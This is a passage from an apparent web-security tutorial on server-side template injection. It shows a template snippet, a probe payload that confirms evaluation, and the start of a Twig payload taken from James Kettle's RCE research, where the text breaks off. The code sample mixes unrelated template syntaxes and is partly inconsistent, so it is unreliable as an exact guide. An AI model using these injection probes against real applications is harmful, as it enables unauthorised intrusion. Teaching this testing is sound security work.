Exploitation
We've reviewed the underlying problem with template engines. Now, let's check how it's possible to exploit them. See the following code:
var greet = 'Hello $name'; <ul> <% for(var i=0; i<data.length; i++) {%> <li><%= data[i] %></li> <% } %> </ul> <div> <p> Welcome, {{ username }} </p> </div>
In this code, the template engine is waiting for a name in order to show the Welcome
string and the name entered. This line will be displayed to the user as a form, looking like this:
To test if it's vulnerable, we'll send a couple of numbers, waiting to be evaluated:
${{1+1}
When the values are sent, the application shows the following:
Hello 2
At this moment, the vulnerability is confirmed. We need to exploit it in order to determine what's the impact. I'll use the payloads developed by James Kettle, from his presentation Server-side Template Injection: RCE for the modern app. Let's insert the next line:
{{_self.env...